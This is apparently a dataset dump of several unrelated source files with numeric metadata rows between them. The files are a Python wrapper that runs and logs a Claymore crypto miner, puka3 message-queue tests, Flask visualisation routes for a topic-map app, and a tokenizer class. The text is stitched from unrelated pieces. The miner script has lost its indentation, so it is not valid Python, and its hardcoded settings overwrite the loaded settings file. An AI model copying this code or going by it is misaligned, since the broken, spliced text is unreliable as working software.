parser = ap.ArgumentParser(description="Claymore Miner Data Extractor")
output_directory = ''
parser.add_argument('-o', '--outputlocation', type=str, help='directory where logs and report files will be saved')
parser.add_argument('-s', '--settingsfile', type=str, help='location of a .json settings file for the miner')
args = parser.parse_args()
#if get the output location argument and assign it to
#output_directory, if there is no trailing slash for
#the directory then add it
if args.outputlocation is not None:
if args.outputlocation[-1] != '\\':
output_directory = '{}\\'.format(args.outputlocation)
else:
output_directory = args.outputlocation
if not os.path.isdir(output_directory):
sys.stdout.write('Output Directory {} does not exist'.format(output_directory))
exit(-1)
#load the miner settings json file
#miner_settings_file_path = 'miner_settings.json'
if args.settingsfile is not None:
if os.path.isfile(args.settingsfile):
# Opening JSON file
settings_file = open(args.settingsfile)
# It returns JSON object as dictionary
try:
miner_settings = json.load(settings_file)
except Exception as e:
sys.stdout.write('error parsing settings file {}'.format(str(e)))
exit(-3)
else:
sys.stdout.write('miner settings file {} does not exist'.format(args.settingsfile))
exit(-2)
miner_settings = {
"executable" : "C:\Claymore.s.dual.ethereum.v15.0.-.widows\EthDcrMiner64.exe",
"epool" : "us-east.ethash-hub.miningpoolhub.com:20535",
"ewal" : "kynrek.3070:x",
"fanmin" : "75",
"fanmax": "100",
"epsw" : "x",
"mode" : "1",
"dbg" : "-1",
"mport" : "0",
"etha" : "0",
"ftime" : "55",
"retrydelay" : "1",
"tt" : "79",
"ttli" : "77",
"tstop" : "89",
"esm" : "2"
}
mining_command = []
for setting_key in miner_settings:
if setting_key == 'executable':
mining_command.append(miner_settings[setting_key])
else:
mining_command.append("-{}".format(setting_key))
mining_command.append(miner_settings[setting_key])
print(mining_command)
#get the current timestamp for naming files
fileNow = datetime.now().strftime("%m-%d-%Y-%H-%M-%S")
#create a variable to count the number of summary records written
summary_records_written = 0
#generate our file names
summaryCSVFileName = '{}minerSummary-{}.csv'.format(output_directory,fileNow)
summaryJSONFileName = '{}minerSummary-{}.json'.format(output_directory,fileNow)
summaryLogFileName = '{}logfile-{}.txt'.format(output_directory,fileNow)
#open our files for write only mode
summaryCSVFile = open(summaryCSVFileName,"w")
summaryJSONFile = open(summaryJSONFileName,"w")
summaryLogFile = open(summaryLogFileName,"w")
#write to the log file to note the start time
summaryLogFile.write('Process Claymore Data Script Started {}\n'.format(datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
#initialize maximumDifficultyOfFoundShare as it is not always present and we need an initial value
maximumDifficultyOfFoundShare = ""
#create our list of files for our CSV file header
fields = [
'hoursMined',
'minutesMined',
'timeStampMonth',
'timeStampDay',
'timeStampHours',
'timeStampMinutes',
'miningServer',
'miningPort',
'miningDurationHours',
'miningDurationMinutes',
'incorrectShares',
'incorrectSharePercentage',
'estimatedStalesPercentage',
'maximumDifficultyOfFoundShare',
'acceptedShares',
'staleShares',
'rejectedShares',
'rejectedStaleShares',
'averageSpeedMinutes',
'averageMegaHashes',
'effectiveSpeed',
'effectiveSpeedAtPool',
'recordLastModified'
]
#create the header line string
headerString = ','.join(fields)
summaryCSVFile.write('{}\n'.format(headerString))
summaryCSVFile.flush()
summaryJSONFile.write('[\n')
summaryJSONFile.flush()
try:
#Start the miner program using subprocess in order to capture the output
p = subprocess.Popen(mining_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
retcode = p.poll()
input_line = p.stdout.readline().decode('utf-8')
sys.stdout.write(input_line)
#get the timestamp from the first line of the summary
m = re.match("\*+ (\d+):(\d+) \*+ (\d+)/(\d+) (\d+):(\d+).*", input_line)
if m:
matches = m.groups()
timeStamp = {
"hoursMined" : matches[0],
"minutesMined" : matches[1],
"timeStampMonth" : matches[2],
"timeStampDay" : matches[3],
"timeStampHours" : matches[4],
"timeStampMinutes" : matches[5]
}
#get connection info
#g='Eth: Mining ETH on us-east.ethash-hub.miningpoolhub.com:20535 for 0:19'
m = re.match("Eth: Mining ETH on (.*):(\d+) for (\d+):(\d+)", input_line)
if m:
matches=m.groups()
connectionInfo= {
'miningServer' : matches[0],
'miningPort' : matches[1],
'miningDurationHours' : matches[2],
'miningDurationMinutes' : matches[3]
}
#print(connectionInfo)
#get incorrect shares line
m = re.match("Eth: Incorrect shares (\d+) \((\d+\.\d+)\%\), est. stales percentage (\d+\.\d+)\%", input_line)
if m:
matches=m.groups()
incorrectShares={
"incorrectShares" : matches[0],
"incorrectSharePercentage" : matches[1],
"estimatedStalesPercentage" : matches[2]
}
#get max difficulty
m = re.match("Eth: Maximum difficulty of found share: (\d+.\d+) GH \(!\)", input_line)
if m:
matches=m.groups()
maximumDifficultyOfFoundShare = matches[0]
#get Share count
m = re.match("Eth: Accepted shares (\d+) \((\d+) stales\), rejected shares (\d+) \((\d+) stales\)", input_line)
if m:
matches = m.groups()
shareCount = {
"acceptedShares" : matches[0],
"staleShares" : matches[1],
"rejectedShares" : matches[2],
"rejectedStaleShares" : matches[3]
}
#get average speed
m = re.match("Eth: Average speed \((\d+) min\): (\d+.\d+) MH/s", input_line)
if m:
matches=m.groups()
averageSpeed = {
'averageSpeedMinutes' : matches[0],
'averageMegaHashes' : matches[1]
}
#get effective speed
m = re.match("Eth: Effective speed: (\d+.\d+) MH/s; at pool: (\d+.\d+) MH/s", input_line)
if m:
matches=m.groups()
effectiveSpeed = {
'effectiveSpeed' : matches[0],
'effectiveSpeedAtPool' : matches[1]
}
summaryRecord = {
'timeStamp' : timeStamp,
'connectionInfo' : connectionInfo,
'shareCount' : shareCount,
'incorrectShares' : incorrectShares,
'maximumDifficultyOfFoundShare' : maximumDifficultyOfFoundShare,
'averageSpeed' : averageSpeed,
'effectiveSpeed' : effectiveSpeed
}
if summary_records_written > 0:
summaryJSONFile.write(',{}\n'.format(summaryRecord))
summaryJSONFile.flush()
else:
summaryJSONFile.write('{}\n'.format(json.dumps(summaryRecord)))
summaryJSONFile.flush()
summary_records_written = summary_records_written + 1
values=[
timeStamp['hoursMined'],
timeStamp['minutesMined'],
timeStamp['timeStampMonth'],
timeStamp['timeStampDay'],
timeStamp['timeStampHours'],
timeStamp['timeStampMinutes'],
connectionInfo['miningServer'],
connectionInfo['miningPort'],
connectionInfo['miningDurationHours'],
connectionInfo['miningDurationMinutes'],
incorrectShares['incorrectShares'],
incorrectShares['incorrectSharePercentage'],
incorrectShares['estimatedStalesPercentage'],
maximumDifficultyOfFoundShare,
shareCount['acceptedShares'],
shareCount['staleShares'],
shareCount['rejectedShares'],
shareCount['rejectedStaleShares'],
averageSpeed['averageSpeedMinutes'],
averageSpeed['averageMegaHashes'],
effectiveSpeed['effectiveSpeed'],
effectiveSpeed['effectiveSpeedAtPool'],
datetime.now().strftime("%m/%d/%Y %H:%M:%S")
]
dataString = ','.join(values)
summaryCSVFile.write('{}\n'.format(dataString))
summaryCSVFile.flush()
#get GPU Details
#h='GPU1: 43C 75% 120W'
m = re.match("GPU(\d+): (\d+)C (\d+)% (\d+)W", input_line)
if m:
matches=m.groups()
gpuDetails={
'gpuNumber' : matches[0],
'gpuTemperatureCelcius' : matches[1],
'gpuPowerPercentage' : matches[2],
'gpuWattage' : matches[3]
}
#get GPU Details
#j='GPUs power: 119.8 W'
m = re.match("GPUs power: (\d+.\d+) W", input_line)
if m:
matches=m.groups()
gpuPower={
'totalGPUsPower' : matches[0]
}
#getspeedupdate
#k='Eth speed: 57.581 MH/s, shares: 17/0/0, time: 1:05'
m = re.match("Eth speed: (\d+.\d+) MH/s, shares: (\d+)/(\d+)/(\d+), time: (\d+):(\d+)", input_line)
if m:
matches=m.groups()
speedUpdate={
'ethSpeedMegaHashes' : matches[0],
'acceptedShares' : matches[1],
'staleShares' : matches[2],
'rejectedShares' : matches[3],
'miningDurationHours' : matches[4],
'miningDurationMinutes' : matches[5]
}
if retcode is not None:
break
except:
p.terminate()
#make sure to terminate the process and write close the json array in the output file
finally:
summaryJSONFile.write(']\n')
summaryJSONFile.flush()
summaryLogFile.write('Process Claymore Data Script Ended {}\n'.format(datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
| 30.31221
| 188
| 0.693759
| 2,298
| 19,612
| 5.859008
| 0.141862
| 0.006536
| 0.011884
| 0.017825
| 0.991236
| 0.98975
| 0.98975
| 0.986928
| 0.986928
| 0.984551
| 0
| 0.013971
| 0.153274
| 19,612
| 646
| 189
| 30.359133
| 0.79682
| 0.15827
| 0
| 0.925926
| 0
| 0.016461
| 0.325196
| 0.055397
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028807
| 0
| 0.028807
| 0.004115
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c0440a41ad645e62e2cefdf8b3483e39206ddc93
| 161
|
py
|
Python
|
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | null | null | null |
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | 6
|
2020-09-24T15:37:56.000Z
|
2021-03-18T16:36:41.000Z
|
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | null | null | null |
# __init__.py
from .pylux_tb import get_num_input
from .pylux_tb import tb_auth_header
from .pylux_tb import tb_req_header
from .pylux_tb import tb_auth_data
| 32.2
| 37
| 0.832298
| 30
| 161
| 3.933333
| 0.433333
| 0.305085
| 0.372881
| 0.576271
| 0.652542
| 0.652542
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 161
| 5
| 38
| 32.2
| 0.842857
| 0.068323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c05c3c47a3dcb4fd52494d5e1f2d21d8456892f0
| 5,002
|
py
|
Python
|
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
import os
import puka3
import base
class TestCancel(base.TestCase):
@base.connect
def test_cancel_single(self, client):
promise = client.queue_declare(queue=self.name)
client.wait(promise)
promise = client.basic_publish(exchange='', routing_key=self.name,
body='a')
client.wait(promise)
consume_promise = client.basic_consume(queue=self.name, prefetch_count=1)
result = client.wait(consume_promise)
self.assertEqual(result['body'], 'a')
promise = client.basic_cancel(consume_promise)
result = client.wait(promise)
self.assertTrue('consumer_tag' in result)
# TODO: better error
# It's illegal to wait on consume_promise after cancel.
#with self.assertRaises(Exception):
# client.wait(consume_promise)
promise = client.queue_delete(queue=self.name)
client.wait(promise)
@base.connect
def test_cancel_multi(self, client):
names = [self.name, self.name1, self.name2]
for name in names:
promise = client.queue_declare(queue=name)
client.wait(promise)
promise = client.basic_publish(exchange='', routing_key=name,
body='a')
client.wait(promise)
consume_promise = client.basic_consume_multi(queues=names,
no_ack=True)
for i in range(len(names)):
result = client.wait(consume_promise)
self.assertEqual(result['body'], 'a')
promise = client.basic_cancel(consume_promise)
result = client.wait(promise)
self.assertTrue('consumer_tag' in result)
# TODO: better error
#with self.assertRaises(Exception):
# client.wait(consume_promise)
promise = client.queue_delete(queue=self.name)
client.wait(promise)
@base.connect
def test_cancel_single_notification(self, client):
promise = client.queue_declare(queue=self.name)
client.wait(promise)
promise = client.basic_publish(exchange='', routing_key=self.name,
body='a')
client.wait(promise)
consume_promise = client.basic_consume(queue=self.name, prefetch_count=1)
result = client.wait(consume_promise)
self.assertEqual(result['body'], 'a')
promise = client.queue_delete(self.name)
result = client.wait(consume_promise)
self.assertEqual(result.name, 'basic.cancel_ok')
# Make sure the consumer died:
promise = client.queue_declare(queue=self.name)
result = client.wait(promise)
self.assertEqual(result['consumer_count'], 0)
@base.connect
def test_cancel_multi_notification(self, client):
names = [self.name, self.name1, self.name2]
for name in names:
promise = client.queue_declare(queue=name)
client.wait(promise)
promise = client.basic_publish(exchange='', routing_key=name,
body='a')
client.wait(promise)
consume_promise = client.basic_consume_multi(queues=names,
no_ack=True)
for i in range(len(names)):
result = client.wait(consume_promise)
self.assertEqual(result['body'], 'a')
promise = client.queue_delete(names[0])
result = client.wait(consume_promise)
self.assertEqual(result.name, 'basic.cancel_ok')
# Make sure the consumer died:
for name in names:
promise = client.queue_declare(queue=name)
result = client.wait(promise)
self.assertEqual(result['consumer_count'], 0)
@base.connect
def test_cancel_multi_notification_concurrent(self, client):
names = [self.name, self.name1, self.name2]
for name in names:
promise = client.queue_declare(queue=name)
client.wait(promise)
promise = client.basic_publish(exchange='', routing_key=name,
body='a')
client.wait(promise)
consume_promise = client.basic_consume_multi(queues=names,
no_ack=True)
for i in range(len(names)):
result = client.wait(consume_promise)
self.assertEqual(result['body'], 'a')
client.queue_delete(names[0])
client.queue_delete(names[2])
result = client.wait(consume_promise)
self.assertEqual(result.name, 'basic.cancel_ok')
# Make sure the consumer died:
for name in names:
promise = client.queue_declare(queue=name)
result = client.wait(promise)
self.assertEqual(result['consumer_count'], 0)
if __name__ == '__main__':
import tests
tests.run_unittests(globals())
| 33.797297
| 81
| 0.594362
| 547
| 5,002
| 5.274223
| 0.13894
| 0.093588
| 0.100173
| 0.106759
| 0.934489
| 0.921664
| 0.907452
| 0.895667
| 0.895667
| 0.895667
| 0
| 0.004315
| 0.305078
| 5,002
| 147
| 82
| 34.027211
| 0.825662
| 0.061975
| 0
| 0.84
| 0
| 0
| 0.031844
| 0
| 0
| 0
| 0
| 0.006803
| 0.13
| 1
| 0.05
| false
| 0
| 0.04
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221fac707309283c0ad47529eeff8e3c9fe6f8c4
| 8,060
|
py
|
Python
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 1,005
|
2019-03-25T12:05:20.000Z
|
2022-03-17T11:40:04.000Z
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 113
|
2019-09-30T00:36:34.000Z
|
2022-02-15T19:58:45.000Z
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 50
|
2019-09-30T00:36:59.000Z
|
2022-02-16T03:41:08.000Z
|
import maya
from flask import Blueprint, render_template
from flask_login import current_user
from topicdb.core.store.retrievalmode import RetrievalMode
from werkzeug.exceptions import abort
from contextualise.topic_store import get_topic_store
bp = Blueprint("visualisation", __name__)
@bp.route("/visualisations/network/<map_identifier>/<topic_identifier>")
def network(map_identifier, topic_identifier):
topic_store = get_topic_store()
collaboration_mode = None
if current_user.is_authenticated: # User is logged in
is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
if is_map_owner:
topic_map = topic_store.get_topic_map(map_identifier, current_user.id)
else:
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
collaboration_mode = topic_store.get_collaboration_mode(map_identifier, current_user.id)
# The map is private and doesn't belong to the user who is trying to
# access it
if not topic_map.published and not is_map_owner:
if not collaboration_mode: # The user is not collaborating on the map
abort(403)
else: # User is not logged in
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
if not topic_map.published: # User is not logged in and the map is not published
abort(403)
topic = topic_store.get_topic(
map_identifier,
topic_identifier,
resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
)
if topic is None:
abort(404)
creation_date_attribute = topic.get_attribute_by_name("creation-timestamp")
creation_date = maya.parse(creation_date_attribute.value) if creation_date_attribute else "Undefined"
return render_template(
"visualisation/network.html",
topic_map=topic_map,
topic=topic,
creation_date=creation_date,
collaboration_mode=collaboration_mode,
)
@bp.route("/visualisations/tags-cloud/<map_identifier>/<topic_identifier>")
def tags_cloud(map_identifier, topic_identifier):
topic_store = get_topic_store()
collaboration_mode = None
if current_user.is_authenticated: # User is logged in
is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
if is_map_owner:
topic_map = topic_store.get_topic_map(map_identifier, current_user.id)
else:
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
collaboration_mode = topic_store.get_collaboration_mode(map_identifier, current_user.id)
# The map is private and doesn't belong to the user who is trying to
# access it
if not topic_map.published and not is_map_owner:
if not collaboration_mode: # The user is not collaborating on the map
abort(403)
else: # User is not logged in
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
if not topic_map.published: # User is not logged in and the map is not published
abort(403)
topic = topic_store.get_topic(
map_identifier,
topic_identifier,
resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
)
if topic is None:
abort(404)
associations = topic_store.get_topic_associations(map_identifier, "tags", instance_ofs=["categorization"])
tags = {}
for association in associations:
for member in association.members:
if member.role_spec == "narrower":
for topic_ref in member.topic_refs:
if topic_ref in tags:
count = tags[topic_ref]
count += 1
tags[topic_ref] = count
else:
tags[topic_ref] = 1
creation_date_attribute = topic.get_attribute_by_name("creation-timestamp")
creation_date = maya.parse(creation_date_attribute.value) if creation_date_attribute else "Undefined"
return render_template(
"visualisation/tags_cloud.html",
topic_map=topic_map,
topic=topic,
creation_date=creation_date,
collaboration_mode=topic_map.collaboration_mode,
tags=tags,
)
@bp.route("/visualisations/timeline/<map_identifier>/<topic_identifier>")
def timeline(map_identifier, topic_identifier):
topic_store = get_topic_store()
collaboration_mode = None
if current_user.is_authenticated: # User is logged in
is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
if is_map_owner:
topic_map = topic_store.get_topic_map(map_identifier, current_user.id)
else:
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
collaboration_mode = topic_store.get_collaboration_mode(map_identifier, current_user.id)
# The map is private and doesn't belong to the user who is trying to
# access it
if not topic_map.published and not is_map_owner:
if not collaboration_mode: # The user is not collaborating on the map
abort(403)
else: # User is not logged in
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
if not topic_map.published: # User is not logged in and the map is not published
abort(403)
topic = topic_store.get_topic(
map_identifier,
topic_identifier,
resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
)
if topic is None:
abort(404)
creation_date_attribute = topic.get_attribute_by_name("creation-timestamp")
creation_date = maya.parse(creation_date_attribute.value) if creation_date_attribute else "Undefined"
return render_template(
"visualisation/timeline.html",
topic_map=topic_map,
topic=topic,
creation_date=creation_date,
collaboration_mode=topic_map.collaboration_mode,
)
@bp.route("/visualisations/map/<map_identifier>/<topic_identifier>")
def geographic_map(map_identifier, topic_identifier):
topic_store = get_topic_store()
collaboration_mode = None
if current_user.is_authenticated: # User is logged in
is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
if is_map_owner:
topic_map = topic_store.get_topic_map(map_identifier, current_user.id)
else:
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
collaboration_mode = topic_store.get_collaboration_mode(map_identifier, current_user.id)
# The map is private and doesn't belong to the user who is trying to
# access it
if not topic_map.published and not is_map_owner:
if not collaboration_mode: # The user is not collaborating on the map
abort(403)
else: # User is not logged in
topic_map = topic_store.get_topic_map(map_identifier)
if topic_map is None:
abort(404)
if not topic_map.published: # User is not logged in and the map is not published
abort(403)
topic = topic_store.get_topic(
map_identifier,
topic_identifier,
resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
)
if topic is None:
abort(404)
creation_date_attribute = topic.get_attribute_by_name("creation-timestamp")
creation_date = maya.parse(creation_date_attribute.value) if creation_date_attribute else "Undefined"
return render_template(
"visualisation/geographic_map.html",
topic_map=topic_map,
topic=topic,
creation_date=creation_date,
collaboration_mode=topic_map.collaboration_mode,
)
| 38.75
| 110
| 0.684119
| 1,045
| 8,060
| 4.973206
| 0.084211
| 0.090822
| 0.062536
| 0.072734
| 0.883587
| 0.846835
| 0.837983
| 0.837983
| 0.837983
| 0.837983
| 0
| 0.010272
| 0.251117
| 8,060
| 207
| 111
| 38.937198
| 0.850729
| 0.103598
| 0
| 0.767442
| 0
| 0
| 0.069167
| 0.04875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.034884
| 0
| 0.081395
| 0.011628
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2220225e920bd6989da92be9dced0ab59b634f0b
| 8,194
|
py
|
Python
|
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | 1
|
2021-07-26T13:10:29.000Z
|
2021-07-26T13:10:29.000Z
|
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | null | null | null |
import collections
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
# 0 is reserved
# make UNK token something
# make vocab size a requirement on creation
# Huge thanks to Leclair et al. for making their tokenizer open source in https://github.com/mcmillco/funcom
class Tokenizer(object):
def __init__(self):
self.word_count = collections.Counter()
self.w2i = {}
self.i2w = {}
self.oov_index = None
self.vocab_size = None
self.vectors = {}
def save(self, path):
pickle.dump(self, open(path, 'wb'))
def load(self, path):
return pickle.load(open(path, 'rb'))
def train(self, texts, vocab_size):
if len(self.word_count) != 0:
raise Exception("To update existing tokenizer with new vocabulary, run update() or update_from_file()")
# takes a list of strings that are space delimited into tokens
for sent in texts:
for w in sent.split():
self.word_count[w] += 1
self.vocab_size = vocab_size
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def train_from_file(self, path, vocab_size):
if len(self.word_count) != 0:
raise Exception("To update existing tokenizer with new vocabulary, run update() or update_from_file()")
# This is for our file representation of "fid, text\n"
self.vocab_size = vocab_size
for line in open(path):
tmp = [x.strip() for x in line.split(',')]
# takes a list of strings that are space delimited into tokens
fid = tmp[0]
sent = tmp[1]
for w in sent.split():
self.word_count[w] += 1
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def update(self, texts):
# takes a list of strings that are space delimited into tokens
for sent in texts:
for w in sent.split():
self.word_count[w] += 1
# reset w2i and i2w for new vocab
self.w2i = {}
self.i2w = {}
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def update_from_file(self, path):
# takes a list of strings that are space delimited into tokens
for line in open(path):
tmp = [x.strip() for x in line.split(',')]
# takes a list of strings that are space delimited into tokens
fid = tmp[0]
sent = tmp[1]
for w in sent.split():
self.word_count[w] += 1
# reset w2i and i2w for new vocab
self.w2i = {}
self.i2w = {}
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def set_vocab_size(self, vocab_size):
self.vocab_size = vocab_size
# reset w2i and i2w for new vocab
self.w2i = {}
self.i2w = {}
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def texts_to_sequences(self, texts, maxlen=None, padding='post', truncating='post', value=0):
if len(self.word_count) == 0:
raise Exception("Tokenizer has not been trained, no words in vocabulary.")
# takes a list of strings that are space delimited into tokens
all_seq = list()
for sent in texts:
seq = []
for w in sent.split():
try:
seq.append(self.w2i[w])
except:
seq.append(self.oov_index)
if maxlen is not None:
if len(seq) == maxlen:
break
all_seq.append(seq)
return pad_sequences(all_seq, maxlen=maxlen, padding=padding, truncating=truncating, value=value)
def texts_to_sequences_from_file(self, path, maxlen=50, padding='post', truncating='post', value=0):
if len(self.word_count) == 0:
raise Exception("Tokenizer has not been trained, no words in vocabulary.")
all_seq = {}
for line in open(path):
tmp = [x.strip() for x in line.split(',')]
# takes a list of strings that are space delimited into tokens
fid = int(tmp[0])
sent = tmp[1]
# takes a list of strings that are space delimited into tokens
seq = []
for w in sent.split():
try:
seq.append(self.w2i[w])
except:
seq.append(self.oov_index)
if maxlen is not None:
if len(seq) == maxlen:
break
all_seq[fid] = seq
return {key: newval for key, newval in zip(all_seq.keys(), pad_sequences(all_seq.values(), maxlen=maxlen, padding=padding, truncating=truncating, value=value))}
def seq_to_text(self, seq):
return [self.i2w[x] for x in seq]
def forw2v(self, seq):
return [self.i2w[x] for x in seq if self.i2w[x] not in ['<NULL>', '<s>', '</s>']]
| 40.364532
| 169
| 0.563217
| 1,164
| 8,194
| 3.864261
| 0.131443
| 0.092041
| 0.058693
| 0.032014
| 0.8257
| 0.799244
| 0.799244
| 0.799244
| 0.799244
| 0.77301
| 0
| 0.029599
| 0.327923
| 8,194
| 202
| 170
| 40.564356
| 0.78718
| 0.229314
| 0
| 0.762963
| 0
| 0
| 0.069725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.02963
| 0.022222
| 0.162963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
223904721ba80255e95f0654d51d897f5edf14ef
| 636
|
py
|
Python
|
ddb/feature/version/schema.py
|
gfi-centre-ouest/docker-devbox-ddb
|
1597d85ef6e9e8322cce195a454de54186ce9ec7
|
[
"MIT"
] | 4
|
2020-06-11T20:54:47.000Z
|
2020-09-22T13:07:17.000Z
|
ddb/feature/version/schema.py
|
gfi-centre-ouest/docker-devbox-ddb
|
1597d85ef6e9e8322cce195a454de54186ce9ec7
|
[
"MIT"
] | 113
|
2019-11-07T00:40:36.000Z
|
2021-01-18T12:50:16.000Z
|
ddb/feature/version/schema.py
|
inetum-orleans/docker-devbox-ddb
|
20c713cf7bfcaf289226a17a9648c17d16003b4d
|
[
"MIT"
] | null | null | null |
